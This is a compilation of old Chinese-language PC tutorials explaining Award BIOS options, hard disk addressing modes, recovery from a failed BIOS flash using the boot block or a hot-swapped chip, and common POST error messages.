    这个选项是用来延迟某些IDE设备初始化的时间。因为这些老式IDE设备在初始化的时候需要一定的时间才能够旋转起来，否则的话就不能检测到这些IDE设备。如果你没有这样老式的IDE设备的话，最好把延迟设为0，加快启动时间。

20．Processor Number Feature（处理器序列号功能）

选项： Enabled, Disabled

    这是关于奔3系列序列号的选项。至于这个功能么，我就不想多说了，各大媒体在前段时间早有大篇的报告了，想必各位读者都对Intel擅自弄出来的这个东东非常反感吧，那我们就在BIOS中把它关闭了吧。

21．Video BIOS Shadowing（映射视频BIOS）

选项： Enabled, Disabled

    当设置为Enable时，视频BIOS就会自动映射到系统内存当中。这样的话系统就能通过64位的内存总线更快的调用视频BIOS,以提高性能。然而现在的操作系统已经完全的跳跃过了视频BIOS这一步，直接调用显卡的硬件资源。既然不直接调用视频BIOS,那把它映射到内存中也没有什么用处，只会白白浪费你的内存资源。

    当然打开视频BIOS也不是完全没有用。DOS游戏由于不能调用显卡的硬件资源因此必须要通过视频BIOS来进行，所以只有当你是一个DOS游戏玩家的话为了提升显示性能，可以把这个选项设置为Enable。

22．Shadowing address ranges (xxxxx-xxxxx Shadow)（映射内存址xxxxx-xxxxx）

选项： Enabled, Disabled

    通过这个选项你可以为其他添加的适配卡手动选择映射在内存址xxxxx-xxxxx当中。如果你没有新添加的适配卡是在这段内存址之内，就应把这个选项设为Disable。同时就像映射视频BIOS一样，如果你使用的是Win95/98系统在为新的适配卡安装了正确的驱动程序之后也不需要把这个选项打开
二. Chipset Features Setup

1. SDRAM RAS-to-CAS Delay (SDRAM RAS-CAS延迟)

选项 : 2, 3

    这个选项允许你设置RAS-CAS的延迟时间。当设为 2时可以减少SDRAM内存的延迟时间，提高内存读写的速度。如果设为2之后系统不稳定的话可以还原为原来的默认值3。

2．SDRAM CAS Latency Time（SDRAM CAS 等待时间）

选项 : 2, 3

    这个选项是用来控制SDRAM在收到了一个读的命令之后的等待时间。等待时间越少，传输速度就越快。然而，有些SDRAM在等待时间设置为2之后会变得不稳定。所以，在内存允许的条件下最好把这个选项设为2，当然如果系统变得不稳定的话就应该还原为默认值3。

3．SDRAM Leadoff Command（SDRAM 开始命令）

选项 : 3, 4

    这个选项允许你手动的调节系统调用储存在内存中的数据的时间。选3的可以提高性能，不稳定的话可以还原为4。

4．DRAM Data Integrity Mode（内存数据整合模式）

选项 : ECC, Non-ECC

    这个BIOS选项是用来设置内存的类型。如果你的爱机装备的时的是带有ECC功能的内存（通常这种内存使用在服务器上）把这个选项设为Enable之后，就会自动就自动检测并且纠正内存中奇数位的错误，但是对于偶数位的错误，则只能检测而不能纠正。这样虽然 会牺牲一些速度，但是却能够是系统运行的更加稳定，因此建议所有使用Ecc内存的读者打开这个选项（不然用比其他普通内存高几倍的价钱买这种内存还有什么意义?）但对于其他使用普通内存的DIY来说，则需要选择Non-ECC，否则也许会引起一些小小的问题。

5．System BIOS Cacheable（系统BIOS缓冲）

选项 : Enabled, Disabled

    这个功能是用来打开或是禁止系统BIOS ROM是否用二级缓存当中F0000h-FFFFFh的区域作为缓冲。带这个选项之后会极大的提高系统调用系统BIOS的速度，但是如今我们使用的操作系统已经很少直接调用系统BIOS了，即使提高了调用系统BIOS的速度也不会提高多少整体速度。因此，这样做不仅提高不了速度，还牺牲了珍贵的二级缓存。另外一方面，如果有什么程序写入了这段内存址之后，就会引起系统的崩溃。为了系统的的性能和稳定，建议这个禁止这个选项。

6.Video BIOS Cacheable(视频BIOS缓冲)

选项 : Enabled, Disabled

    这个功能是用来打开或是禁止视频BIOS ROM是否用二级缓存当中C0000h-C7FFFh的区域作为缓冲，与系统BIOS缓冲一样，这个功能也是牺牲了宝贵的二级缓存来存放视频BIOS。同时如果有什么程序写入了这段内存址之后，也会引起系统的崩溃。因此，建议这个禁止这个选项。

7．Video RAM Cacheable（显存缓冲）

选项 : Enabled, Disabled

    这个功能是用来打开或是禁止系统BIOS ROM是否用二级缓存当中A0000h-AFFFFh的区域作为缓冲。这将极大的提高显存与系统交换数据的速度，但是并不能提高系统的总体速度。因为大多数显卡的显存的带宽至少是1.6GB/s (128bit x 100MHz)，而SDRAM的带宽只有0.8GB/s (64bit x 100MHz)左右。由于P2-500的二级缓存带宽是2.0GB/s因此系统主要的瓶颈存在于二级缓存与主存当中，而不是二级缓存与显存当中。用二级缓存来给内存作为缓存显然更加合理。另外一方面，如果有程序写入了被用作显卡的缓冲的这段内存址之后，也会引起系统崩溃。

8．8-bit I/O Recovery Time （8位I/O回复时间）

选项 : NA, 8, 1, 2, 3, 4, 5, 6, 7

    由于PCI总线比ISA总线更加快，因此一些老式的ISA卡不能很好的工作在PCI总线当中。为了解决这个问题，BIOS的这个选项允许你能够手动的调整ISA设备的循环周期，设为NA的话无疑会给你的老ISA卡带来更好的性能。当然的话，如果你没有ISA卡的话这个选项也就没有用了。

9．Memory Hole At 15M-16M（内存段寻址于15M-16M）

选项 : Enabled, Disabled

    有些特殊的ISA卡需要在这段内存址内才能够工作。打开这个选项之后就会预留一段内存址给ISA卡，同时系统也只能够使用16MB内存。所以，除非你的ISA卡需要打开这个选项才能够工作，不然最好关闭这个选项。

10．AGP Aperture Size (MB)（AGP 通道大小）

选项 : 4, 8, 16, 32, 64, 128, 256

    这个选项允许你指定AGP显卡最大能使用系统主存的多少，手动指定AGP显卡最大能使用系统主存的大小。但这与与系统性能的提高关系并不大。由于目前的游戏都需要消耗大量的显存来储存贴图，因此在这里可以把值设到最大。

11．Auto Detect DIMM/PCI Clk（自动检测 DIMM/PCI设备）

选项 : Enabled, Disabled

    这个选项是为了减少电磁干扰而设置的，设置为Enable之后BIOS可以监视AGP, PCI and SDRAM插槽的状态。如果在这些插槽中没有适配卡的话，BIOS就会关闭这些插槽的时钟信号，既减少机箱内的电磁干扰，使系统更加稳定，但是这样的话会牺牲一些性能。因此如果你的电脑没有任何电磁干扰问题，建议关闭这个选项来提高系统的性能。

12．Flash BIOS Protection（BIOS防写保护）

选项 : Enabled, Disabled

    这个功能是为了保护BIOS不被他人用刷写工具随意刷新BIOS而设置的。当设置为Enable时，就可以打开防写保护了。当然了，如果你要刷新BIOS是千万要记得要把这个选项设置为Disable，不然的话，刷写是不够能够成功的。BIOS保护功能是非常有用的一个功能，还记得前段时间CIH病毒肆虐么？对大多数DIY们来说硬盘上的数据并不太重要，但是BIOS被刷了就...结果各个杀毒软件公司就是靠CIH大赚了一笔。现在只要打开了这个功能就能够防止病毒随意刷写BIOS了(也不知道是不是真的能够防得了)。反正打开这个功能总是不会错的。-:)

13．Hardware Reset Protect（硬启动保护）

选项 : Enabled, Disabled

    这个功能主要是为全天运行的文件服务器和路由器设置的，当设置为Enable之后，机箱面板上的Reset键就会失去作用，这样你就不会因为不小心碰中Reset键而重新起动服务器了。如果设置为Disable的话，Reset键就会恢复正常了。所以对大多数用户来说，设置为 Disalbe是最合适的，除非你使用的是一台服务器或是你们家里面的小弟弟特别喜欢碰机箱面板上的那个可爱的小按钮... ;-)
三.Integrated Peripherals

1.　Onboard IDE-1 Controller(板载IDE-1控制器)

选项 : Enabled, Disabled

    这个功能允许你你激活或是禁止主板上的第一个IDE控制器。在通常的情况下板载的IDE控制器是处于激活状态的。如果设置为Disable之后，该接口上的所有IDE设备都不能工作。如果完全不使用IDE设备的话可以设置Disable以节约一个IRQ给其他的设备使用。

2.Onboard IDE-2 Controller(板载IDE-2控制器)

选项 : Enabled, Disabled

    板载第二个IDE控制器，这个功能允许你激活或是禁止主板上的第二个IDE控制器，与前面的第一个选项的功能一样。

3.Master/Slave Drive PIO Mode（主/从 驱动器PIO模式）

选项 : 0, 1, 2, 3, 4, Auto

    这个选项通常是与Onboard IDE-1 Controller 或者 Onboard IDE-2 Controller选项是在一起的。如果在前面的选项中你禁止了任何一个板载IDE控制器，那么与这个IDE控制器相对应的‘主/从 驱动器PIO模式’的选项就会变成灰色。因此只有在前面的Onboard IDE-1 Controller 或者 Onboard IDE-2 Controller设置为Enables时才能够通过这个选项来设置IDE设备的PIO（Programmed Input/Output）模式。在一般的情况下，应当设为Auto。但是如果你是一个超频爱好者的话（硬盘超频？）可以在这个选项中对IDE设备进行超频（这对硬盘不支持最新的UDMA的朋友来说真是有福了）为了硬盘的稳定，硬盘厂商在硬盘出厂前把硬盘的传输模式标低一点，现在我们可以利用这点提高硬盘的传输模式从而提高硬盘的传输速率。怎么样，还不打算超频你的旧硬盘么？我们在这里只要把硬盘的模式设高一点就可以得到更高的传输率了。跟超频CPU一样，超频后的硬盘有可能会丢失数据，不过对于旧硬盘来说能最大的发挥它的作用才是最重要的。不过要注意的是这里所指的是旧硬盘，如果你现在使用的是支持UDMA的新硬盘的话就注意不要把你的硬盘‘降频’了。

下面的图表就在PIO模式下IDE设备的传输速率：

PIO 数据传输模式 最大传输率 (MB/s)

PIO Mode 0　　　 3.3

PIO Mode 1　　　　5.2

PIO Mode 2 　　　8.3

PIO Mode 3　　　 11.1

PIO Mode 4　　　 16.6

4.Master/Slave Drive Ultra DMA（主/从 驱动器Ultra DMA模式）

选项 : Auto, Disabled

    这个选项也是与Onboard IDE-1 Controller 或者 Onboard IDE-2 Controller选项是在一起的。如果在前面的选项中你禁止了任何一个板载IDE控制器，那么于这个IDE控制器相对应的‘主/从 驱动器Ultra DMA模式’的选项就会变成灰色。在这里我们可以激活或是禁止UltraDMA传输模式（如果硬盘支持的话）。一般的情况下应该把它设为Auto,让BIOS自动检测硬盘是否支持UltraDMA。但是值得注意的一点的是要真正的实现DMA33或是DMA66需要操作系统的支持，在BIOS中仅仅是打开了这个选项而已。具体的步骤就进入WIN95/98后，右击‘我的电脑’选择‘ 属性’，然后再硬盘属性的项目中选择DMA就可以了，对于某些VIA主板在硬盘属性中DMA选项是灰色的（这大概是芯片组的Bug吧），因此需要安装了VIA四合一的补丁程序之后才可以选择DMA项目。

以下是有关DMA模式传输率列表：

DMA模式 　　　最大传输率 (MB/s)

DMA Mode 0 　　4.16

DMA Mode 1 　　13.3

DMA Mode 2 　　16.6

UltraDMA 33 　33.3

UltraDMA 66 　66.7

5.Ultra DMA-66 IDE Controller（Ultra DMA-66 IDE 控制器）

选项 : Enabled, Disabled

    这个选项你可以打开或是禁止板载的DMA-66控制器。如果要使用DMA-66的设备，只要设成Enable就行了。如果主板上的IDE设备不支持DMA-66或是这些设备有问题的话（这种情况在一些兼容主板上经常出现的）可以把它设为Disable,这样做的话不仅可以避免问题的发生，甚至可以减少一些启动的时间。

6.USB Controller（USB控制器）

选项 : Enabled, Disabled

    主要是用来打开或是禁止USB(通用串行总线)，打开之后就可以使用USB设备了，如果没有USB设备的话就应该禁止这个选项，这样做不仅减少了系统的冲突问题，而且还可以节省出一个IRQ给其他的设备使用。

7.USB Keyboard Support（USB键盘支持）

选项 : Enabled, Disabled

    打开这个选项之后就可以使用USB键盘了，如果没有的话就把它关闭了吧。

8.USB Keyboard Support Via（USB键盘支持通过）

选项 : OS,BIOS通过这个选项可以选择是使用操作系统或是BIOS来支持USB键盘,如果使用Windows98的话就选OS,这样的话在USB键盘Win98中的功能就会多一些。如果你仍然在使用MS-DOS的话就选BIOS，可以不加载驱动程序在MS-DOS下直接使用USB键盘。

9.Init Display First（初始化显示类型）

选项 : AGP, PCI

    在你有两块显卡并且只一个显示器的情况下，这个功能就显得格外的有用，因为通过设置可以选择使用AGP或是PCI显卡来使用显示器。如果只有一块显卡的话，在这里就硬正确选择你目前使用的显卡类型，以减少启动所用的时间。

10.KBC Input Clock Select （选择键盘输入时钟频率）

选项 : 8MHz, 12MHz, 16MHz

    这个功能用来调节键盘的频率以提高响应速度。选择16MHz的话，响应速度就越快。但是如果键盘受不了这么高的频率的话有可能会变得不稳定或是不能够初始化，就应该把频率降下来。

11.Power On Function（打开电源方式）

选项 : Button Only, Keyboard 98, Hot Key, Mouse Left, Mouse Right

    这个选项允许你是用以下任何一种方式开机。在一般的情况是设为Button Only（只使用开关键），其他的选项分别是使用98键，热键，和鼠标。值得注意的一点是，如果你现在使用的是COM或是USB接口的鼠标是开不了机的，因为只有PS/2接口的鼠标支持鼠标开机功能，COM 接口和 USB接口的鼠标都不支持这个功能，当然罗，一些PS/2届都的‘老鼠’也许会存在一些兼容性的问题导致开不了机，这是只要把选项设为只使用开关键就可以了。Keyboard 98项只要安装了Win98之后用键盘上的唤醒键来开机就可以了。当然了，像我这样使用老键盘的用户只有使用键盘上的热键来开机了，在键盘上你可以自定义从Ctrl-F1 到Ctrl-F12的热键来开机，cool吧？这下你可以在朋友面前威风一下了。当然了，不管用任何一种方式开机都不会对启动速度有任何影响的，就看个人习惯而已了。

12.Onboard FDD Controller（板载软驱控制器）

选项 : Enabled, Disabled

    这个功能能主要是用来打开或是禁止板载软驱控制器的。在默认的情况下板载软盘控制器是打开的，如果使用的其他的软盘控制器或者只根本没有软盘的话可以把这个选项关闭以节省下一个IRQ.

13.Onboard Serial Port 1/2（板载串行口）

选项 : Disabled, 3F8h/IRQ4, 2F8h/IRQ3, 3E8h/IRQ4, 2E8h/IRQ3, 3F8h/IRQ10, 2F8h/IRQ11, 3E8h/IRQ10, 2E8h/IRQ11, Auto

    这个功能允许你手动配置串行口的I/O址和IRQ,通常硬把这个选项设为Auto让BIOS自动设置I/O址和IRQ。但是如果你的某些设备和串行口所占用的地址冲突的话，可以在这里通过手动设置来解决问题。但是对于不使用串行口的用户来说可以在这里选择Disable以节省一个IRQ。

14.Onboard Parallel Port （板载并行口）

选项 : 3BCh/IRQ7, 278h/IRQ5, 378h/IRQ7, Disabled

    这个功能允许你手动配置并行口的I/O址和IRQ,在大多数情况下，默认的I/O 地址 378h 和 IRQ 7都能够正常的工作。如果你的并行口与其他的设备有冲突，可以手动配置其他的I/O 地址和IRQ给并行口以解决问题。

15.Parallel Port Mode（并行口模式）

选项 : ECP, EPP, ECP+EPP, Normal (SPP)

    这个功能通常副属于Parallel Port option这个选项内，如果你禁止了板载串行口，这个功能通常会消失或是变成灰色不可选的状态。在这里有四个模式可以选择，默认的值 是Normal (SPP)，SPP模式与其他的的并口设备的兼容性最好，但是速度也最慢。另外还有其他的两个可选模式就是ECP（增强Com口）, EPP( 增强并行端口)。ECP由于使用了DMA协议，所以最大数据传输率可达到2.5Mbits/s，适用于需要与接口设备进行单向大量数据传输情况（比如说使用扫描仪或是打印机），而EPP则适用于与需要与接口设备进行双向数据相互传输的情况（比如说一些连接在并口上的驱动器）。但是对于不知道该选择以上那种模式的用户来说,BIOS提供了ECP+EPP的模式，即BIOS自动选择以上两种模式中的一种（当然了，这需要你的接口设备支持以上两种模式中的其中的一种才行）但是这样的话往往达不到最高的性能，因此为了提高接口设备的传输速度，最好正确选择其中一种模式。

16.ECP Mode Use DMA（ECP模式使用DMA）

选项 : Channel 1, Channel 3

    这个功能也是副属于Parallel Port option选项内，通常应选择Channel 3，如果设备有冲突的话可以选择Channel 1。

17.EPP Mode Select(EPP模式选择)

选项 : EPP 1.7, EPP 1.9

    这个功能也是副属于Parallel Port option选项内，通过这个选项可以选择EPP传输模式的版本，当然了虽然这两个选项表面上看不出有什么不同，但是根据以往的经验来说版本越高的也就更完善，要不然的话软件怎么天天都在升级呢？因此，就选EPP 1.9吧。

四.PNP/PCI Configuration

1.PNP OS Installed (即插即用操作系统已安装)

选项 : Yes, No

    如果你现在使用的是像Win9x这样即插即用的操作系统，就把这个选项设为Yes,让操作系统管理所有的设备资源，如果选No的话就BIOS就会自动管理设备资源。说到这里，使用ISA卡的Linux的用户要注意了，因为大多数的Linux的版本都附带一个叫做ISAPNPTOOLS的工具来配置ISA卡。如果把这个选项设置为 No的话，BIOS就会自动的配置ISA卡的资源，同时ISAPNPTOOLS也会帮助ISA卡配置资源，因此有可能两者会产生冲突。解决的办法就是把PNP OS Installed设置为Yes,让ISAPNPTOOLS自动帮助ISA卡配置资源，问题就有可能解决。怎么样？你的老ISA声卡是不是不能够在Linux下发声？先这把这个选项设置为Yes吧(默认的设置是No),这样的话你的声卡说不定又能够在Linux重新焕发生机了！ -:)

2.Force Update ESCD / Reset Configuration Data（强制更新ESCD/重置配置数据）

选项 : Enabled, Disabled

    ESCD(扩展系统配置数据)是即插即用BIOS的一个功能，用于储存系统IRQ, DMA, I/O和内存的信息。通常这个选项被设为Disable。但是如果你安装的新适配卡引起资源冲突的话（比如说系统不能正常启动），就应该把这个选项重新打开让BIOS从新配置即插即用设备，以解决新设备的冲突问题。在下次重起时BIOS又会自动把这个选项设为Disable。

3.Resource Controlled By（资源控制使用）

选项 : Auto, Manual

    通常情况下应设置为Auto,让BIOS自动为即插即用设备配置IRQ和DMA资源。除非BIOS不能自动为设备分配资源时就应该选择Manual手动为各个设备分配IRQ和DMA。

4.Assign IRQ For VGA（分配IRQ给VGA）

选项 : Enabled, Disabled

    现在许多的3D加速卡都需要分配一个IRQ才能够正常的工作，如果设为Disable以后这些显卡有可能不能够正常工作或是性能大打折扣。然而一些低端的显卡不需要IRQ也能够正常工作，因此除非你急切需要一个空余的IRQ，否则就应把这个选项设为Enable。

5.Assign IRQ For USB(分配IRQ给USB)

选项 : Enabled, Disabled

    这个功能用来打开或是禁止USB设备，如果没有USB设备的话就把这个选项设为Disable以节省出一个IRQ给其他的设备使用。

5.PIRQ_0 Use IRQ No. ~ PIRQ_3 Use IRQ No.( PIRQ_0使用IRQ 号 ~ PIRQ_3使用IRQ号 )

选项 : Auto, 3, 4, 5, 7, 9, 10, 11, 12, 14, 15

    在这个选项中你可以手动的为安装在AGP和PCI总线的设备指定IRQ。这个功能在你把硬盘那到其它的机子上又不想重新安装操作系统来检测IRQ时显得特别的有用。这时只要把原来的IRQ记住然后再BIOS中手动指定每个设备原来的IRQ号新的设备就可以正常工作了。

总论

     通过对BIOS各个选项的了解不仅可以最有优化的设置BIOS,提升系统的速度，而且往往可以再BIOS的设置中解决一些Windows中解决不了的系统问题。如果大家有这样的问题，先不要急着去找经销商，应先彻底的把BIOS中的各个选项检查一便，看看有没有以上所出现的问题，如果有的话，把BIOS选项重新设置以便就有可能解决这些问题了。好了，不知不觉一口气说了那么多，大家是不是对BIOS的高级设置有了多一些的了解呢？那现在还等什么呢，还不快吧BIOS设置成最优的状态！


BIOS可以被映射

《一键清理系统垃圾》

BIOS可以被映射

因为BIOS使用的ROM比我们使用的普通内存RAM要慢很多，所以人们就想出在启动后把BIOS的ROM里面的信息拷贝到我们插的内存条（RAM）里来，提高读取速度，而在RAM里的这些BIOS的信息就叫做BIOS影子内存。


BIOS设置引起的软件安装故障

《一键清理系统垃圾》

BIOS设置引起的软件安装故障

    最近要学英语，就借来了朋友的教学软件《科利华英语学习的革命》，可问题却也随之而来。

    该软件对系统内存的最小要求是16MB，建议为24MB。该软件在安装前首先检查机器配置是否符合要求。结果令我大吃一惊。内存不足！我的机器为PⅡ350 CPU、微星6199主板、64MB内存、中文Win 98操作系统。

    以前在其他机器上安装该软件都没有问题！那些机器有32MB的，也有64MB的。

    难道该软件要求的是剩余的物理内存而不是安装的内存总量（乱猜的:p）？立即用“系统工具”中的“系统监视器”查看，我的64MB内存已所剩无几了，仅13MB左右。既然如此，那就再加64MB吧，于是另找了一条64MB内存插到主板上，心想现在该差不多了吧？此时在“系统监视器”显示：未使用物理内存——78923328。我觉得这时应该没有问题了。

    可放入光盘安装的时候，系统还是提示：“内存不足，安装被迫中止！”这可邪门了，明明报告未使用物理内存——78923328吗？看来问题不在于到底有多少未使用的内存，一定是机器的设置有问题，而与内存有关的只可能是BIOS。

    进入BIOS，在BIOS FEATURES SETUP 中的各项都沾不上边，那CHIPSET FEATURES SETUP 呢？突然发现有一个“Memory Hole At 15M-16M”选项，设置值为Enabled，这不是将15MB-16MB的内存地址部分留给ISA扩展卡用吗？改为Disabled。重新启动、安装软件，整个过程一切顺利。

    原来，一般情况下，ISA扩展卡只能存取到16MB以上，而“15M-16M”是系统所使用的，若将CMOS中 Memory Hole At 15M-16M 的值设为Enabled，则机器将内存储器中15MB-16MB的位址部分留给ISA扩展卡使用，系统就不能使用这部分内存了，安装《科利华英语学习的革命》时，它便错误地认为内存不足16MB，理所当然就拒绝安装了。BIOS中此选项厂家的预设值基本上都为Disabled。


BIOS设置中硬盘模式的含义

《一键清理系统垃圾》

BIOS设置中硬盘模式的含义

现在主板支持三种硬盘工作模式：NORMAL、LBA和LARGE模式。

    NORMAL普通模式是最早的IDE方式。在此方式下对硬盘访问时,BIOS和IDE控制器对参数不作任
何转换。该模式支持的最大柱面数为1024,最大磁头数为16,最大扇区数为63,每扇区字节数为
512。因此支持最大硬盘容量为：512×63×16×1024=528MB。在此模式下即使硬盘的实际物理容
量更大,但可访问的硬盘空间也只能是528MB。

    LBA(Logical Block Addressing)逻辑块寻址模式。这种模式所管理的硬盘空间突破了528KB
的瓶颈,可达8.4GB。在LBA模式下,设置的柱面、磁头、扇区等参数并不是实际硬盘的物理参数。
在访问硬盘时,由IDE控制器把由柱面、磁头、扇区等参数确定的逻辑地址转换为实际硬盘的物理
地址。在LBA模式下,可设置的最大磁头数为255,其余参数与普通模式相同。由此可计算出可访问
的硬盘容量为:512×63×255×1024=8.4GB。

    LARGE大硬盘模式。当硬盘的柱面超过1024而又不为LBA支持时可采用此种模式。LARGE模式采
取的方法是把柱面数除以2,把磁头数乘以2,其结果总容量不变。例如,在NORMAL模式下柱面数为
1220,磁头数为16,进入LARGE模式则柱面数为610,磁头数为32。这样在DOS看来柱面数小于1024,即
可正常工作。目前基本上只有LBA有实际意义了。


BIOS升级失败的恢复方法

《一键清理系统垃圾》

BIOS升级失败的恢复方法

    相信各位“老鸟”都有升级BIOS的经历，升级BIOS可以使计算机获得许多新的功能，比如主板对更高级CPU的支持，对大容量硬盘的支持，对新的操作系统的支持及修正主板本身的一些BUG。
升级BIOS是一件简单的事情，但如果疏忽大意或遇到外界不可抗力，BIOS的升级就会失败，造成黑屏。BIOS升级失败主要有以下2种情况：1.使用了错误的BIOS版本；2.在BIOS擦写过程中突然断电。这些都有可能造成电脑无法正常启动。
下面我来介绍几种BIOS的恢复方法：
1.最简单可靠的方法就是找主板供应商更换一块新的BIOS芯片，但要注意您的主板一定要是从正当的渠道购买来的，这样才享有售后服务。如您购买了假货或水货，主板供应商将以假货或水货为由拒绝向您提供售后服务，这时您可连哭都来不及了！
2.在BIOS中，有一个引导块叫（Boot Block），当BIOS升级时，这部分一般是不覆盖的，这样在写入失败后，电脑仍能启动。不过，BIOS Boot只支持ISA显卡和软驱，当主板上插的是PCI或AGP显卡时，启动电脑会黑屏。这时候，可以找一块ISA显卡换上，不过要先说明的是您在升级BIOS时一定要做一张启动盘。然后用那张启动盘进行恢复。如果您找不到ISA显卡只好另找一台计算机，在那张启动盘上编辑一个Autoexec.bat文件，在里面加上执行语句，如W6163IMJ.260 /py/sn（W6163IMJ.260是备份下来的旧BIOS的文件名）。
3.拔掉已损坏的主板BIOS，方法是先断电。然后用一字螺丝刀从两边将BIOS芯片撬松，拔下BIOS芯片。再找一块相同型号的主板BIOS芯片对准插座轻轻插入。开机进入CMOS，在BIOS Features Setup 一项中，开启所有ROM映射功能。但最关键的是要将Chipset Features Setup中的System BIOS Cacheable一项置为Enable。重新用软盘启动计算机，运行与主板相应的BIOS刻录程序，并在程序中要求备份当前的BIOS程序，这时不要关闭计算机，将正常的BIOS芯片拔下，换上已损坏的BIOS芯片，拔下BIOS芯片时不要接触其他电路，因为带电插拔是非常危险的。此时继续运行刻录程序，用储存下来的BIOS程序更新BIOS。完成后重新启动计算机即可。
最后要说明的是，现在升级BIOS大多从互联网上下载，您一定要去正规的大网站或主板供应商的网站上去下载，并用网络蚂蚁监测看是否下载时有错误存在。这样也可减少BIOS升级的失败几率。


BIOS升级失败的原因及处理办法

《一键清理系统垃圾》

BIOS升级失败的原因及处理办法

    升级BIOS一向被普通用户视之为禁地，大都不敢随便操作，而正是由于这种误解再加上CIH病毒的猖狂，使得很多用户对BIOS升级有着一种莫名的恐惧心理，绝大多数用户的BIOS仍是购机时的，一次也没更新过。实际上BIOS升级并不像我们想象的那么神秘，也不是那么难以驾御，只要按正确的步骤进行升级操作，一切真的很简单。你不信？有不少“大虾”级玩家除定期更新自己爱机的BIOS文件外，不少人还对BIOS进行个性修改，如添加个人信息或更改开机时的LOGO呢!本文就BIOS升级失败的原因及处理办法进行讲解，以便读者能顺利地升级。
#1　　一、可能导致BIOS升级失败的原因
    从理论上来讲，升级BIOS的危险并不大，但一些“倒霉事”或其它意想不到的事情，都有可能导致升级失败。下面是几种最常见的升级失败的原因：
    1.在写入BIOS过程中断电：除非你的机器上装有UPS，否则选择一般不会随便断电的时间（比如晚上）进行BIOS升级比较保险。
    2.文件损坏：文件在压缩或者传输过程中损坏，尤其是下载的文件，这种情况时有发生，所以一定要到主板厂商的网站或大的驱动站点下载。不过，损坏了的BIOS文件大都无法通过刷新软件的检测，所以你不必过于担心。
    3.升级文件错误：这种情况通常是在不经意中发生的，即误用了其它品牌或其它型号主板的BIOS进行升级。由于目前的刷新软件通常都会对硬件进行检测，所以真正由此产生严重后果的情形并不多。
#1　　二、如何在BIOS升级失败后进行恢复
    如果你能正确按照升级步骤进行BIOS刷新，一般情况下是不会出什么大问题的，但万一真的碰到中途断电等意外情况，BIOS恐怕就保不住了，怎么办呢？各位不要担心，一切都可以搞定的。
    1.更换新的BIOS芯片。这当然是最有效也是最简单的一种方法，你可以与代理商或主板生产厂商联系，向他们寻求你所需要的BIOS芯片，用它替换损坏的芯片即可。绝大多数主板厂商都会向用户提供BIOS芯片（有的还是免费提供），但这一方法比较费时而且麻烦。
    2.利用BIOS Boot Block引导块恢复。主要思路是利用BIOS上的一个BIOS Block（开机引导块）进行恢复。因为在一般情况下Flash ROM中的BOOT Block模块不会在BIOS升级过程中被破坏，但它只能支持很少的硬件如ISA显卡和软驱等，如果你的显卡是AGP或PCI的，在恢复过程中将是漆黑一片。不过，我们完全可以利用这个BIOS Boot Block引导块完成恢复工作，具体步骤如下（以Award BIOS为例）：
    （1）做一张DOS启动盘，只保留三个启动文件，一定不能有Config.sys和Autoexec.bat两个文件。
    （2）将Awdflash.exe和＊.bin文件拷贝到软盘中。
    （3）在启动盘中建立一个Autoexec.bat文件，内容如下：
    Awdflah.exe ＊.bin /sn /py（＊.bin是你的BIOS更新文件，而其中的参数/sn /py则表示不备份，而仅仅刷新BIOS）。
    （4）用此软盘重新启动，系统会根据Autoexec.bat自动刷新BIOS，此时虽看不到任何显示（假如你用ISA显卡更换AGP、PCI显卡，可以看到有关信息），但你可注意到软驱灯是亮的，而且软驱在读盘，等软驱灯熄灭后稍待片刻就可重新启动，如果一切顺利，系统BIOS已经恢复正常了。
    不过，要想使用这个方法来恢复损坏的BIOS，最好在升级BIOS前就要做好这张恢复盘或到其它机器上做恢复盘。
    3.热插拔法。你可以利用一台与你的BIOS芯片完全相同、可以正常工作的计算机启动到DOS状态下，用平口螺丝刀小心地拔出工作正常的BIOS芯片，然后将损坏的BIOS芯片插入，进行BIOS升级，一般情况下很快就可以将损坏的BIOS起死回生。但这个方法危险性极大，不是老鸟级的高手请勿试验，因为在气候干燥的季节和环境下，热插拔过程中产生的瞬间放电有可能对主板和芯片造成极大的损害，所以在热插拔前最好设置接地导线，同时在BIOS设置中要开启所有ROM映射功能，即将System BIOS Cacheable设为Enable。
    看完上述介绍，各位读者对BIOS升级还有什么害怕吗？快去下载最新BIOS吧，立刻对你的爱机BIOS进行升级，以发挥主板的最大性能。


BIOS是否需要更新？

《一键清理系统垃圾》

BIOS是否需要更新？

《中国电脑教育报》李峰

    笔者原则上不赞成DIY初学者去更新主板上的BIOS程序，除非这块主板真有很严重的问题。

    更新BIOS的风险相当高！以笔者自己为例，笔者看见主板所附的光盘中有一个更新BIOS的工具，心想怎么这么方便，直接就上网更新了BIOS，结果当然是惨！惨！惨！！主板无法使用，笔者只好想办法把BIOS从主板拆下来，好不容易请朋友借到了工具，结果一不小心，力道不对，BIOS的针脚歪了一根（笔者的脸也自然跟着歪了）……回首往事，只能说笔者当年真是年少无知呀！

    BIOS更新出点小情况，轻一点还有机会恢复（但恢复的方法对一般初学者而言，的确有些门槛），严重的话只有送修，至于费用嘛，100～300元不等，甚至可能更贵，所以不可不慎！

    只要主板能正常运作，就不必更新BIOS。除非你从原厂的网站中得知电脑出问题的原因确实是因为BIOS的Bug时，那么你才有必要去更新，否则最好别轻易尝试。


◆ BIOS ROM checksum error-System halted

《一键清理系统垃圾》

◆ BIOS ROM checksum error-System halted

    翻译：BIOS 信息在进行总和检查 ( checksum ) 时发现错误，因此无法开机。
    解析：会遇到这种问题...通常是「死定了」！通常是因为 BIOS 信息刷新不完
全所造成的.

    ◆ CMOS battery failed
    翻译：CMOS 电池失效。
    解析：这表是 CMOS 电池的电力已经不足，请更换电池。

    ◆ CMOS checksum error-Defaults loaded
    翻译：CMOS 执行整和检查时发现错误，因此载入预设的系统设定值。
    解析：通常发生这种状况都是因为电池电力不足所造成，因此建议先换电源看看。如果此情形依然存在，那就有可能是 CMOS RAM 有问题，而因为 CMOS RAM 我们个人是无法维修的，所以建议送回原厂处理。

    ◆ Display switch is set incorrectly
    翻译：显示开关配置错误。
    解析：较旧型的主机板上有 Jumper 可设定萤幕为单色或彩色，而此讯息表示主机板上的设定和 BIOS 里的设定不一致，所以只要判断主机板和BIOS谁为正确，然后更新错误的设定即可。

    ◆ Press ESC to skip memory test
    翻译：在内存测试中，可按下 ESC 略过。
    解析：如果你在 BIOS 内并没有设定快速测试的话，那么开机就会执行电脑零件的测试，如果你不想等待，可按 ESC 略过或到 BIOS 内开启 Quick Power On Self Test一劳永逸

    ◆ HARD DISK initizlizing 【Please wait a moment...】
    翻译：正在对硬盘做起始化 ( Initizlize ) 动作。
    解析：这种讯息在较新的硬盘上根本看不到。但在较旧型的硬盘上，其动作因为较慢，所以就会看到这个讯息。

